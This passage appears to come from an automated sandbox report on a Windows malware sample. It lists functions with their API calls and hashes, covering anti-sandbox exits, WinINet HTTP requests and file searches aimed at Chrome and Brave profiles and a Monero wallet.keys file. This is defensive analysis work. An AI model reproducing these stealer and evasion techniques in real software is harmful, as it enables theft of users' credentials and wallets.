                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 5190c00fcc2a6a2a36b70ce59827f20ae8c61135c67d848b48b9ba77e0b3b767
                                  • Instruction ID: 6f57a7674fa837a52da76af81e05294f97f330cafc7d8b03a612d3f0f0d41c1b
                                  • Opcode Fuzzy Hash: 5190c00fcc2a6a2a36b70ce59827f20ae8c61135c67d848b48b9ba77e0b3b767
                                  • Instruction Fuzzy Hash: 8401FFB0E44318EADF10DBE4DC4AB9DBB78BB14705F608144E705BA2C1D67859858799
                                  Function 00726AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 726af3 1451 726b0a 1450->1451 1453 726aba-726ad7 call 72aad0 OpenEventA 1451->1453 1454 726b0c-726b22 call 726920 call 725b10 CloseHandle ExitProcess 1451->1454 1460 726af5-726b04 CloseHandle Sleep 1453->1460 1461 726ad9-726af1 call 72aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00726AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00726AF9
                                  • Sleep.KERNEL32(00001770), ref: 00726B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726B1A
                                  • ExitProcess.KERNEL32 ref: 00726B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: e147fee07109540fa0a7e12a7e43e24a5c195408e4838c3c1b624e08d02eee02
                                  • Instruction ID: e837d68b58d60f70c9a8e47e6a1b8c97cd5cda7edf75a49070b18881da394a3a
                                  • Opcode Fuzzy Hash: e147fee07109540fa0a7e12a7e43e24a5c195408e4838c3c1b624e08d02eee02
                                  • Instruction Fuzzy Hash: 95F05E70944329EFE710BBA0FC0ABBD7B34EF14702F208616B502A11C1CBB85540E75A
                                  Function 007147B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 2bed1ec1947d971d32543715c96397f0834116ee6c8e297092b3b5156731a9af
                                  • Instruction ID: 65ed709ccd8f1f2146aaa4d493cb465042a2ccb4158cae21eea4db9425728bfa
                                  • Opcode Fuzzy Hash: 2bed1ec1947d971d32543715c96397f0834116ee6c8e297092b3b5156731a9af
                                  • Instruction Fuzzy Hash: 88213EB1D00209ABDF14DFA4E849ADE7B75FF44320F108625F915A72C1EB746A05CB81
                                  Function 007251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 00716280: InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
                                    • Part of subcall function 00716280: StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716303
                                    • Part of subcall function 00716280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
                                    • Part of subcall function 00716280: HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
                                    • Part of subcall function 00716280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
                                    • Part of subcall function 00716280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007163D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: e117d714f822fac1c5def7dbbcd42c39d16053754ed848bcae136939b592c5f9
                                  • Instruction ID: c1143f4f669cc57a144419e4243d39542591ebc4ae5ff9560e169f50eeeda037
                                  • Opcode Fuzzy Hash: e117d714f822fac1c5def7dbbcd42c39d16053754ed848bcae136939b592c5f9
                                  • Instruction Fuzzy Hash: 55110070910158FBDB14FF64ED5AAED7378AF54300F808168F91A5A592EF38AB05C691
                                  Function 007278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0072792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: eeb78bc594294701931979abe7a812ac99f1180ae2d14adb721a9ed76f567797
                                  • Instruction ID: fe6f471640823665ddf7764c6c477db344e2228aa0e36cbfa6c45866faaffc70
                                  • Opcode Fuzzy Hash: eeb78bc594294701931979abe7a812ac99f1180ae2d14adb721a9ed76f567797
                                  • Instruction Fuzzy Hash: 7C0186B1908304EBC714DF95DD45BABBBB8F704B11F104219F645E3380C3785940CBA1
                                  Function 00711110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0071112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00711132
                                  • ExitProcess.KERNEL32 ref: 00711143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 24660c2cab464d515c24df372af217dcbe24a9f0df6af433fb53d0bc4ca85c75
                                  • Instruction ID: f461eb7c58c763088e03c8d7d3888de6904c1388065474c9c9e858d15091ffc5
                                  • Opcode Fuzzy Hash: 24660c2cab464d515c24df372af217dcbe24a9f0df6af433fb53d0bc4ca85c75
                                  • Instruction Fuzzy Hash: 5CE0E670D5930CFBE710ABA59C0EB497A78AB04B12F504154F7097A5D0D6B52640A79D
                                  Function 007110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007110B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007110F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: d0b83ad2f82131f5402fb34704deae6dd2430bdcf7ff0e18ccaf01d9ee7c8c8d
                                  • Instruction ID: 1a6875d6d791802bd42cd0a25d85897c43240c43e0f4c1d8529f96551352abf4
                                  • Opcode Fuzzy Hash: d0b83ad2f82131f5402fb34704deae6dd2430bdcf7ff0e18ccaf01d9ee7c8c8d
                                  • Instruction Fuzzy Hash: 5EF0E271A41318BBE7149AA8AC49FAEB7ECE709B15F300548F604E7280D572AF40DBA5
                                  Function 00711190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727910
                                    • Part of subcall function 007278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00727917
                                    • Part of subcall function 007278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0072792F
                                    • Part of subcall function 00727850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007111B7), ref: 00727880
                                    • Part of subcall function 00727850: RtlAllocateHeap.NTDLL(00000000), ref: 00727887
                                    • Part of subcall function 00727850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0072789F
                                  • ExitProcess.KERNEL32 ref: 007111C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: ff1e38d0a8eaa145ad55595900f8070b1c0b8cf5dd12c64f873de1b15fd1880c
                                  • Instruction ID: 93294562a301e0b1351f477a306b4bee4d4d4c525d50cfbb5f487159d7239bf5
                                  • Opcode Fuzzy Hash: ff1e38d0a8eaa145ad55595900f8070b1c0b8cf5dd12c64f873de1b15fd1880c
                                  • Instruction Fuzzy Hash: 17E012B5D28315A3CB0473B5BD0FB2A369C5B14346F440524FA05D6152FE2DE800D66A

                                  Non-executed Functions

                                  Function 007238B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 007238CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007238E3
                                  • lstrcat.KERNEL32(?,?), ref: 00723935
                                  • StrCmpCA.SHLWAPI(?,00730F70), ref: 00723947
                                  • StrCmpCA.SHLWAPI(?,00730F74), ref: 0072395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00723C67
                                  • FindClose.KERNEL32(000000FF), ref: 00723C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 1436a88c9db8c1669132637827a16e044b27bd14162e03cf48940dbd74755fcc
                                  • Instruction ID: 045d8ecd9ba04f4ea8127e9af187d4dcd8cf261f7a5dfa5a27dacc98a971bd9b
                                  • Opcode Fuzzy Hash: 1436a88c9db8c1669132637827a16e044b27bd14162e03cf48940dbd74755fcc
                                  • Instruction Fuzzy Hash: C4A142B19103189BDB24DF65DC89FEE7379BB48301F044588F64D96181EB79AB84CFA2
                                  Function 0071BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00730B32,00730B2B,00000000,?,?,?,007313F4,00730B2A), ref: 0071BEF5
                                  • StrCmpCA.SHLWAPI(?,007313F8), ref: 0071BF4D
                                  • StrCmpCA.SHLWAPI(?,007313FC), ref: 0071BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0071C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 878bd66600b8741c859a87316c19161bae3af40e0f882b3851d79f66e351173f
                                  • Instruction ID: 9105b14cdf007c8e0d9fb932ec0fceee54df9358e805588ffca6d7e090b371bf
                                  • Opcode Fuzzy Hash: 878bd66600b8741c859a87316c19161bae3af40e0f882b3851d79f66e351173f
                                  • Instruction Fuzzy Hash: 15426572910118FBDB15FB74EC9AEED737DAF48300F404568F50696181EE38AB49CB96
                                  Function 00724910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0072492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00724943
                                  • StrCmpCA.SHLWAPI(?,00730FDC), ref: 00724971
                                  • StrCmpCA.SHLWAPI(?,00730FE0), ref: 00724987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00724B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00724B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
